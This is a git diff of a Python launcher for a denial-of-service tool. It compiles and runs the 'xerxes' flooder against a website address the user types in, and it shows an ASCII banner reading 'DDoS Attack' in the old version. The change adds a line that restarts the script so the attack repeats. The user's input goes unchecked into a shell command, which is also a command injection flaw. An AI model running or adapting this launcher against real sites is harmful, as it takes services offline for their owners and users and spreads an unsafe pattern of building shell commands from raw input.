diff --git a/run.py b/run.py index 64e9655..9f57055 100644 --- a/run.py +++ b/run.py @@ -1,13 +1,15 @@ import os +import sys os.system("clear") print(""" - ____ ____ _ _ _ _ -| _ \| _ \ ___ ___ / \ | |_| |_ __ _ ___| | __ -| | | | | | |/ _ \/ __| / _ \| __| __/ _` |/ __| |/ / -| |_| | |_| | (_) \__ \ / ___ \ |_| || (_| | (__| < -|____/|____/ \___/|___/ /_/ \_\__|\__\__,_|\___|_|\_\ +___ ____ ____ ____ ___ ___ ____ ____ _ _ +| \ | | [__ |__| | | |__| | |_/ +|__/ |__| ___] | | | | | | |___ | \_ + """) os.system("chmod +x xerxes.c") os.system("gcc xerxes.c -o xerxes") a = input("\n Enter website address eg : www.fakesite.com \n Website Name : ") os.system("./xerxes "+a+" 80") + +os.execv(sys.executable, ['python'] + sys.argv)